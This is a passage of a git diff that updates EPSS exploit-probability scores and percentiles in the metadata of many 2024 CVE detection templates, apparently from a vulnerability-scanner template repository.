b/http/cves/2024/CVE-2024-0337.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2024-0337 epss-score: 0.01388 - epss-percentile: 0.79938 + epss-percentile: 0.79928 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-0593.yaml b/http/cves/2024/CVE-2024-0593.yaml index 88b26a4def7..37dd3a8039b 100644 --- a/http/cves/2024/CVE-2024-0593.yaml +++ b/http/cves/2024/CVE-2024-0593.yaml @@ -19,7 +19,7 @@ info: cvss-score: 5.3 cve-id: CVE-2024-0593 epss-score: 0.11927 - epss-percentile: 0.93541 + epss-percentile: 0.93535 cwe-id: CWE-862 cpe: cpe:2.3:a:awsm:simple_job_board:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2024/CVE-2024-0692.yaml b/http/cves/2024/CVE-2024-0692.yaml index bb6940da981..4aba8083883 100644 --- a/http/cves/2024/CVE-2024-0692.yaml +++ b/http/cves/2024/CVE-2024-0692.yaml @@ -17,8 +17,8 @@ info: cvss-score: 8.8 cve-id: CVE-2024-0692 cwe-id: CWE-502 - epss-score: 0.85268 - epss-percentile: 0.99327 + epss-score: 0.83078 + epss-percentile: 0.99233 cpe: cpe:2.3:a:solarwinds:security_event_manager:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-0799.yaml b/http/cves/2024/CVE-2024-0799.yaml index 22ee8fcde76..ec12d1b9d24 100644 --- a/http/cves/2024/CVE-2024-0799.yaml +++ b/http/cves/2024/CVE-2024-0799.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-0799 cwe-id: CWE-287 epss-score: 0.45936 - epss-percentile: 0.97524 + epss-percentile: 0.9752 cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-0801.yaml b/http/cves/2024/CVE-2024-0801.yaml index 986f3e3b606..45869ad9897 100644 --- a/http/cves/2024/CVE-2024-0801.yaml +++ b/http/cves/2024/CVE-2024-0801.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2024-0801 epss-score: 0.5403 - epss-percentile: 0.97922 + epss-percentile: 0.9792 cwe-id: CWE-75 cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2024/CVE-2024-0881.yaml b/http/cves/2024/CVE-2024-0881.yaml index 7ce1aa7d44a..b798b4604b0 100644 --- a/http/cves/2024/CVE-2024-0881.yaml +++ b/http/cves/2024/CVE-2024-0881.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-0881 cwe-id: CWE-284 epss-score: 0.13073 - epss-percentile: 0.93885 + epss-percentile: 0.93881 metadata: verified: true max-request: 3 diff --git a/http/cves/2024/CVE-2024-0939.yaml b/http/cves/2024/CVE-2024-0939.yaml index 20a205492c9..a1c80a01e32 100644 --- a/http/cves/2024/CVE-2024-0939.yaml +++ b/http/cves/2024/CVE-2024-0939.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-0939 cwe-id: CWE-434 epss-score: 0.88582 - epss-percentile: 0.99485 + epss-percentile: 0.99484 cpe: cpe:2.3:o:byzoro:smart_s210_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-10081.yaml b/http/cves/2024/CVE-2024-10081.yaml index 83862e2ad72..7228a70427f 100644 --- a/http/cves/2024/CVE-2024-10081.yaml +++ b/http/cves/2024/CVE-2024-10081.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-10081 cwe-id: CWE-288 epss-score: 0.65481 - epss-percentile: 0.98429 + epss-percentile: 0.98432 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-10146.yaml b/http/cves/2024/CVE-2024-10146.yaml index dcff994bc82..f976c9eed9e 100644 --- a/http/cves/2024/CVE-2024-10146.yaml +++ b/http/cves/2024/CVE-2024-10146.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-10146 cwe-id: CWE-79 epss-score: 0.01384 - epss-percentile: 0.79914 + epss-percentile: 0.79905 cpe: cpe:2.3:a:simplefilelist:simple_file_list:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index 647a5103cd8..d85d7d3ee61 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-1021 cwe-id: CWE-918 - epss-score: 0.93217 - epss-percentile: 0.99787 + epss-score: 0.9315 + epss-percentile: 0.99781 cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-10708.yaml b/http/cves/2024/CVE-2024-10708.yaml index 9caa8845eba..72aedda6c03 100644 --- a/http/cves/2024/CVE-2024-10708.yaml +++ b/http/cves/2024/CVE-2024-10708.yaml @@ -19,8 +19,8 @@ info: cvss-score: 4.9 cve-id: CVE-2024-10708 cwe-id: CWE-22 - epss-score: 0.02455 - epss-percentile: 0.84814 + epss-score: 0.04834 + epss-percentile: 0.89203 cpe: cpe:2.3:a:bowo:system_dashboard:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-10783.yaml b/http/cves/2024/CVE-2024-10783.yaml index 10ea302c4b1..b55904cfa49 100644 --- a/http/cves/2024/CVE-2024-10783.yaml +++ b/http/cves/2024/CVE-2024-10783.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-10783 cwe-id: CWE-862 epss-score: 0.23135 - epss-percentile: 0.95744 + epss-percentile: 0.95749 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-10812.yaml b/http/cves/2024/CVE-2024-10812.yaml index b338d565b36..97b45916c1e 100644 --- a/http/cves/2024/CVE-2024-10812.yaml +++ b/http/cves/2024/CVE-2024-10812.yaml @@ -14,7 +14,7 @@ info: - https://huntr.com/bounties/51408ebd-e0be-489d-8088-f210087dbd6a classification: epss-score: 0.00314 - epss-percentile: 0.54094 + epss-percentile: 0.54085 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-10908.yaml b/http/cves/2024/CVE-2024-10908.yaml index bbeb5883a4d..e4e57cf1f27 100644 --- a/http/cves/2024/CVE-2024-10908.yaml +++ b/http/cves/2024/CVE-2024-10908.yaml @@ -14,7 +14,7 @@ info: - https://huntr.com/bounties/61f5e725-5579-4d08-8a88-e4ba04e6d1f2 classification: epss-score: 0.00638 - epss-percentile: 0.69949 + epss-percentile: 0.6993 metadata: shodan-query: html:"Chatbot Arena" verified: true diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml index 556a16b4159..5c2ba0ffc59 100644 --- a/http/cves/2024/CVE-2024-10914.yaml +++ b/http/cves/2024/CVE-2024-10914.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-10914 cwe-id: CWE-707 - epss-score: 0.93814 - epss-percentile: 0.99853 + epss-score: 0.93635 + epss-percentile: 0.99829 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: vendor: dlink diff --git a/http/cves/2024/CVE-2024-11238.yaml b/http/cves/2024/CVE-2024-11238.yaml index 20c7c7a5fbf..215b7b0335b 100644 --- a/http/cves/2024/CVE-2024-11238.yaml +++ b/http/cves/2024/CVE-2024-11238.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-11238 cwe-id: CWE-22 epss-score: 0.10821 - epss-percentile: 0.93139 + epss-percentile: 0.93134 cpe: cpe:2.3:a:landray:landray_ekp:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-11303.yaml b/http/cves/2024/CVE-2024-11303.yaml index 9185cdb34f6..930906a8937 100644 --- a/http/cves/2024/CVE-2024-11303.yaml +++ b/http/cves/2024/CVE-2024-11303.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cwe-id: CWE-22 epss-score: 0.09955 - epss-percentile: 0.92811 + epss-percentile: 0.92804 metadata: max-request: 1 tags: seclists,cve,cve2024,korenix,lfi,vkev,vuln diff --git a/http/cves/2024/CVE-2024-11320.yaml b/http/cves/2024/CVE-2024-11320.yaml index fd2c4b364e6..f51c5280ce1 100644 --- a/http/cves/2024/CVE-2024-11320.yaml +++ b/http/cves/2024/CVE-2024-11320.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-11320 cwe-id: CWE-77 epss-score: 0.92171 - epss-percentile: 0.99697 + epss-percentile: 0.99696 cpe: cpe:2.3:a:pandorafms:pandora_fms:*:*:*:*:*:*:*:* metadata: vendor: pandorafms diff --git a/http/cves/2024/CVE-2024-11396.yaml b/http/cves/2024/CVE-2024-11396.yaml index 075f11f66fe..f28670df86c 100644 --- a/http/cves/2024/CVE-2024-11396.yaml +++ b/http/cves/2024/CVE-2024-11396.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-11396 cwe-id: CWE-359 epss-score: 0.47484 - epss-percentile: 0.97602 + epss-percentile: 0.97597 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-11587.yaml b/http/cves/2024/CVE-2024-11587.yaml index a9feff74e6c..4febfd25706 100644 --- a/http/cves/2024/CVE-2024-11587.yaml +++ b/http/cves/2024/CVE-2024-11587.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-11587 classification: epss-score: 0.00808 - epss-percentile: 0.73715 + epss-percentile: 0.73692 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-11587 diff --git a/http/cves/2024/CVE-2024-11740.yaml b/http/cves/2024/CVE-2024-11740.yaml index 1bc29112ff3..cac8ba199d3 100644 --- a/http/cves/2024/CVE-2024-11740.yaml +++ b/http/cves/2024/CVE-2024-11740.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-11740 cwe-id: CWE-94 epss-score: 0.03748 - epss-percentile: 0.87678 + epss-percentile: 0.87681 cpe: cpe:2.3:a:wpdownloadmanager:download_manager:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-1183.yaml b/http/cves/2024/CVE-2024-1183.yaml index 0a16ee89431..ab328a00261 100644 --- a/http/cves/2024/CVE-2024-1183.yaml +++ b/http/cves/2024/CVE-2024-1183.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-1183 cwe-id: CWE-601 epss-score: 0.65669 - epss-percentile: 0.9844 + epss-percentile: 0.98442 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-11921.yaml b/http/cves/2024/CVE-2024-11921.yaml index 2e22ff09131..4109ffaeb35 100644 --- a/http/cves/2024/CVE-2024-11921.yaml +++ b/http/cves/2024/CVE-2024-11921.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-11921 cwe-id: CWE-79 epss-score: 0.01006 - epss-percentile: 0.76579 + epss-percentile: 0.76572 metadata: max-request: 2 tags: cve,cve2024,wordpress,wp,wp-plugin,give,xss,authenticated,vuln diff --git a/http/cves/2024/CVE-2024-11972.yaml b/http/cves/2024/CVE-2024-11972.yaml index bac19fa7fbf..a775e270dbf 100644 --- a/http/cves/2024/CVE-2024-11972.yaml +++ b/http/cves/2024/CVE-2024-11972.yaml @@ -20,7 +20,7 @@ info: cvss-score: 9.8 cve-id: CVE-2024-11972 epss-score: 0.91677 - epss-percentile: 0.99663 + epss-percentile: 0.99662 cpe: cpe:2.3:a:themehunk:hunk_companion:*:*:*:*:*:wordpress:*:* metadata: vendor: themehunk diff --git a/http/cves/2024/CVE-2024-1209.yaml b/http/cves/2024/CVE-2024-1209.yaml index c6f83289b0c..f33b61390f1 100644 --- a/http/cves/2024/CVE-2024-1209.yaml +++ b/http/cves/2024/CVE-2024-1209.yaml @@ -20,7 +20,7 @@ info: cvss-score: 5.3 cve-id: CVE-2024-1209 epss-score: 0.44186 - epss-percentile: 0.97434 + epss-percentile: 0.97431 cpe: cpe:2.3:a:learndash:learndash:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-12987.yaml b/http/cves/2024/CVE-2024-12987.yaml index 976cb486895..58b1ef7a377 100644 --- a/http/cves/2024/CVE-2024-12987.yaml +++ b/http/cves/2024/CVE-2024-12987.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-12987 cwe-id: CWE-78 epss-score: 0.81091 - epss-percentile: 0.99117 + epss-percentile: 0.99119 cpe: cpe:2.3:h:draytek:vigor300b:-:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2024/CVE-2024-13126.yaml b/http/cves/2024/CVE-2024-13126.yaml index b0cfe643563..36c66e11af4 100644 --- a/http/cves/2024/CVE-2024-13126.yaml +++ b/http/cves/2024/CVE-2024-13126.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-13126 cwe-id: CWE-552 epss-score: 0.00607 - epss-percentile: 0.69091 + epss-percentile: 0.69077 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-13160.yaml b/http/cves/2024/CVE-2024-13160.yaml index 4d1bad5fbe6..fed2cdf2847 100644 --- a/http/cves/2024/CVE-2024-13160.yaml +++ b/http/cves/2024/CVE-2024-13160.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-13160 cwe-id: CWE-36 epss-score: 0.92818 - epss-percentile: 0.99753 + epss-percentile: 0.99752 metadata: max-request: 1 shodan-query: http.favicon.hash:362091310 diff --git a/http/cves/2024/CVE-2024-13161.yaml b/http/cves/2024/CVE-2024-13161.yaml index b2e866eb8bf..db0d577a549 100644 --- a/http/cves/2024/CVE-2024-13161.yaml +++ b/http/cves/2024/CVE-2024-13161.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-13161 cwe-id: CWE-36 epss-score: 0.9131 - epss-percentile: 0.99636 + epss-percentile: 0.99635 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-13322.yaml b/http/cves/2024/CVE-2024-13322.yaml index e122020c0e7..8dd41f8abe3 100644 --- a/http/cves/2024/CVE-2024-13322.yaml +++ b/http/cves/2024/CVE-2024-13322.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-13322 cwe-id: CWE-89 epss-score: 0.16565 - epss-percentile: 0.947 + epss-percentile: 0.94698 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-13496.yaml b/http/cves/2024/CVE-2024-13496.yaml index 844b0097849..6d0b4d07017 100644 --- a/http/cves/2024/CVE-2024-13496.yaml +++ b/http/cves/2024/CVE-2024-13496.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-13496 cwe-id: CWE-89 epss-score: 0.40342 - epss-percentile: 0.97223 + epss-percentile: 0.97222 metadata: max-requests: 2 fofa-query: body="/wp-content/plugins/gamipress" diff --git a/http/cves/2024/CVE-2024-13624.yaml b/http/cves/2024/CVE-2024-13624.yaml index d5465b3d2d7..ef91b26fe48 100644 --- a/http/cves/2024/CVE-2024-13624.yaml +++ b/http/cves/2024/CVE-2024-13624.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-13624 cwe-id: CWE-79 epss-score: 0.0043 - epss-percentile: 0.61997 + epss-percentile: 0.61996 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-13726.yaml b/http/cves/2024/CVE-2024-13726.yaml index 4a4feffd181..696bf932492 100644 --- a/http/cves/2024/CVE-2024-13726.yaml +++ b/http/cves/2024/CVE-2024-13726.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2024-13726 classification: epss-score: 0.13988 - epss-percentile: 0.94124 + epss-percentile: 0.9412 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-13853.yaml b/http/cves/2024/CVE-2024-13853.yaml index 5a4f55b106d..ec07d4bc21f 100644 --- a/http/cves/2024/CVE-2024-13853.yaml +++ b/http/cves/2024/CVE-2024-13853.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-13853 cwe-id: CWE-79 epss-score: 0.00418 - epss-percentile: 0.61328 + epss-percentile: 0.61327 metadata: max-request: 1 vendor: WordPress diff --git a/http/cves/2024/CVE-2024-13888.yaml b/http/cves/2024/CVE-2024-13888.yaml index 425acc98693..854849e4687 100644 --- a/http/cves/2024/CVE-2024-13888.yaml +++ b/http/cves/2024/CVE-2024-13888.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-13888 cwe-id: CWE-601 epss-score: 0.00803 - epss-percentile: 0.73631 + epss-percentile: 0.73607 metadata: verified: true max-request: 2 diff --git a/http/cves/2024/CVE-2024-13979.yaml b/http/cves/2024/CVE-2024-13979.yaml index d1040028ba9..690e5626e45 100644 --- a/http/cves/2024/CVE-2024-13979.yaml +++ b/http/cves/2024/CVE-2024-13979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-13979 cwe-id: CWE-89 epss-score: 0.07018 - epss-percentile: 0.91212 + epss-percentile: 0.91211 cpe: cpe:2.3:a:st._joe_erp_system_project:st._joe_erp_system:-:*:*:*:*:*:*:* metadata: verified: false diff --git a/http/cves/2024/CVE-2024-1483.yaml b/http/cves/2024/CVE-2024-1483.yaml index 95e263d70a7..ef5429be326 100644 --- a/http/cves/2024/CVE-2024-1483.yaml +++ b/http/cves/2024/CVE-2024-1483.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-1483 cwe-id: CWE-29 epss-score: 0.78605 - epss-percentile: 0.98994 + epss-percentile: 0.98992 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-1561.yaml b/http/cves/2024/CVE-2024-1561.yaml index fa7235c256f..b1bdf432801 100644 --- a/http/cves/2024/CVE-2024-1561.yaml +++ b/http/cves/2024/CVE-2024-1561.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2024-1561 cwe-id: CWE-29 epss-score: 0.93609 - epss-percentile: 0.99824 + epss-percentile: 0.99826 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:python:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-20404.yaml b/http/cves/2024/CVE-2024-20404.yaml index bd3d5c468bc..810b5a1b928 100644 --- a/http/cves/2024/CVE-2024-20404.yaml +++ b/http/cves/2024/CVE-2024-20404.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cve-id: CVE-2024-20404 - epss-score: 0.83806 - epss-percentile: 0.99267 + epss-score: 0.79919 + epss-percentile: 0.99062 cwe-id: CWE-918 metadata: verified: true diff --git a/http/cves/2024/CVE-2024-20419.yaml b/http/cves/2024/CVE-2024-20419.yaml index 2537d7d57a1..ba80d8e0b63 100644 --- a/http/cves/2024/CVE-2024-20419.yaml +++ b/http/cves/2024/CVE-2024-20419.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-20419 cwe-id: CWE-620 epss-score: 0.91421 - epss-percentile: 0.99643 + epss-percentile: 0.99642 metadata: fofa-query: title="On-Prem License Workspace" verified: true diff --git a/http/cves/2024/CVE-2024-20439.yaml b/http/cves/2024/CVE-2024-20439.yaml index 183c14b45e6..8b0dfa0e88d 100644 --- a/http/cves/2024/CVE-2024-20439.yaml +++ b/http/cves/2024/CVE-2024-20439.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-20439 cwe-id: CWE-912 - epss-score: 0.84893 - epss-percentile: 0.99311 + epss-score: 0.86315 + epss-percentile: 0.99382 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-2053.yaml b/http/cves/2024/CVE-2024-2053.yaml index 2270be92a07..e8d67ece94a 100644 --- a/http/cves/2024/CVE-2024-2053.yaml +++ b/http/cves/2024/CVE-2024-2053.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-2053 cwe-id: CWE-23 epss-score: 0.31684 - epss-percentile: 0.96652 + epss-percentile: 0.96655 cpe: cpe:2.3:a:articatech:artica_proxy:4.40:*:*:*:*:*:*:* metadata: vendor: articatech diff --git a/http/cves/2024/CVE-2024-20767.yaml b/http/cves/2024/CVE-2024-20767.yaml index 1168fc9ca1c..c1440f143a4 100644 --- a/http/cves/2024/CVE-2024-20767.yaml +++ b/http/cves/2024/CVE-2024-20767.yaml @@ -21,8 +21,8 @@ info: cvss-score: 8.2 cve-id: CVE-2024-20767 cwe-id: CWE-284 - epss-score: 0.9415 - epss-percentile: 0.99908 + epss-score: 0.94125 + epss-percentile: 0.99905 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-21136.yaml b/http/cves/2024/CVE-2024-21136.yaml index bacfe644a20..e2cb68da220 100644 --- a/http/cves/2024/CVE-2024-21136.yaml +++ b/http/cves/2024/CVE-2024-21136.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.6 cve-id: CVE-2024-21136 epss-score: 0.42062 - epss-percentile: 0.97322 + epss-percentile: 0.97319 cpe: cpe:2.3:a:oracle:retail_xstore_office:19.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-21485.yaml b/http/cves/2024/CVE-2024-21485.yaml index 021fe20e0ba..73f26fa4575 100644 --- a/http/cves/2024/CVE-2024-21485.yaml +++ b/http/cves/2024/CVE-2024-21485.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2024-21485 cwe-id: CWE-79 epss-score: 0.00493 - epss-percentile: 0.65069 + epss-percentile: 0.6505 cpe: cpe:2.3:a:plotly:dash:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2024/CVE-2024-21644.yaml b/http/cves/2024/CVE-2024-21644.yaml index 8738643eac6..0a3516e932d 100644 --- a/http/cves/2024/CVE-2024-21644.yaml +++ b/http/cves/2024/CVE-2024-21644.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-21644 cwe-id: CWE-284 epss-score: 0.87321 - epss-percentile: 0.99426 + epss-percentile: 0.99428 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-21645.yaml b/http/cves/2024/CVE-2024-21645.yaml index 5ad5071b4e9..27946fe8f64 100644 --- a/http/cves/2024/CVE-2024-21645.yaml +++ b/http/cves/2024/CVE-2024-21645.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-21645 cwe-id: CWE-74 epss-score: 0.73493 - epss-percentile: 0.9876 + epss-percentile: 0.98759 cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-21650.yaml b/http/cves/2024/CVE-2024-21650.yaml index ae3c8709e29..40cb9e683d0 100644 --- a/http/cves/2024/CVE-2024-21650.yaml +++ b/http/cves/2024/CVE-2024-21650.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-21650 cwe-id: CWE-95 epss-score: 0.92865 - epss-percentile: 0.99758 + epss-percentile: 0.99757 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2024/CVE-2024-21683.yaml b/http/cves/2024/CVE-2024-21683.yaml index 1c0ef769157..40135182b28 100644 --- a/http/cves/2024/CVE-2024-21683.yaml +++ b/http/cves/2024/CVE-2024-21683.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2024-21683 cwe-id: CWE-78 epss-score: 0.94054 - epss-percentile: 0.99894 + epss-percentile: 0.99893 cpe: cpe:2.3:a:atlassian:confluence_data_center:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-21887.yaml b/http/cves/2024/CVE-2024-21887.yaml index 20f0f93bea3..52f78a1a961 100644 --- a/http/cves/2024/CVE-2024-21887.yaml +++ b/http/cves/2024/CVE-2024-21887.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2024-21887 cwe-id: CWE-77 epss-score: 0.94412 - epss-percentile: 0.99977 + epss-percentile: 0.99976 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-22207.yaml b/http/cves/2024/CVE-2024-22207.yaml index 06435395460..2c637d6bb0c 100644 --- a/http/cves/2024/CVE-2024-22207.yaml +++ b/http/cves/2024/CVE-2024-22207.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-22207 cwe-id: CWE-1188 epss-score: 0.16258 - epss-percentile: 0.94611 + epss-percentile: 0.94609 cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:node.js:*:* metadata: vendor: smartbear diff --git a/http/cves/2024/CVE-2024-22319.yaml b/http/cves/2024/CVE-2024-22319.yaml index b0750a8f0af..26f3771697d 100644 --- a/http/cves/2024/CVE-2024-22319.yaml +++ b/http/cves/2024/CVE-2024-22319.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2024-22319 cwe-id: CWE-74 epss-score: 0.90528 - epss-percentile: 0.99589 + epss-percentile: 0.99588 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-22320.yaml b/http/cves/2024/CVE-2024-22320.yaml index 953cf88a65f..6cd61acec83 100644 --- a/http/cves/2024/CVE-2024-22320.yaml +++ b/http/cves/2024/CVE-2024-22320.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-22320 cwe-id: CWE-502 epss-score: 0.92327 - epss-percentile: 0.99711 + epss-percentile: 0.9971 cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-23334.yaml b/http/cves/2024/CVE-2024-23334.yaml index f2cce879cd4..ea1fa47fe23 100644 --- a/http/cves/2024/CVE-2024-23334.yaml +++ b/http/cves/2024/CVE-2024-23334.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2024-23334 cwe-id: CWE-22 epss-score: 0.93577 - epss-percentile: 0.99821 + epss-percentile: 0.99823 cpe: cpe:2.3:a:aiohttp:aiohttp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index a0e3af88771..ceb3b7e7eaf 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -20,7 +20,7 @@ info: cvss-score: 5.3 cve-id: CVE-2024-2340 epss-score: 0.56658 - epss-percentile: 0.98043 + epss-percentile: 0.98042 metadata: verified: true max-request: 1 diff --git a/http/cves/2024/CVE-2024-24112.yaml b/http/cves/2024/CVE-2024-24112.yaml index 8efe5e9fb04..228c99338a6 100644 --- a/http/cves/2024/CVE-2024-24112.yaml +++ b/http/cves/2024/CVE-2024-24112.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-24112 cwe-id: CWE-89 epss-score: 0.81133 - epss-percentile: 0.99121 + epss-percentile: 0.99123 cpe: cpe:2.3:a:exrick:xmall:1.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-24131.yaml b/http/cves/2024/CVE-2024-24131.yaml index d27b1b23002..97367f797da 100644 --- a/http/cves/2024/CVE-2024-24131.yaml +++ b/http/cves/2024/CVE-2024-24131.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-24131 cwe-id: CWE-79 epss-score: 0.07723 - epss-percentile: 0.91665 + epss-percentile: 0.91663 cpe: cpe:2.3:a:superwebmailer:superwebmailer:9.31.0.01799:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-24565.yaml b/http/cves/2024/CVE-2024-24565.yaml index 41bd000c1a2..55f9af784d3 100644 --- a/http/cves/2024/CVE-2024-24565.yaml +++ b/http/cves/2024/CVE-2024-24565.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2024-24565 cwe-id: CWE-22 epss-score: 0.85571 - epss-percentile: 0.99343 + epss-percentile: 0.99342 cpe: cpe:2.3:a:cratedb:cratedb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2024/CVE-2024-2473.yaml b/http/cves/2024/CVE-2024-2473.yaml index ffbb1e8ef18..1f916027e8c 100644 --- a/http/cves/2024/CVE-2024-2473.yaml +++ b/http/cves/2024/CVE-2024-2473.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2024-2473 cwe-id: CWE-200 epss-score: 0.07274 - epss-percentile: 0.91395 + epss-percentile: 0.91393 cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2024/CVE-2024-24759.yaml b/http/cves/2024/CVE-2024-24759.yaml index caffc1f43c8..8786963807e 100644 --- a/http/cves/2024/CVE-2024-24759.yaml +++ b/http/cves/2024/CVE-2024-24759.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2024-24759 cwe-id: CWE-918 - epss-score: 0.79283 - epss-percentile: 0.99028 + epss-score: 0.78343 + epss-percentile: 0.9898 cpe: cpe:2.3:a:mindsdb:mindsdb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git 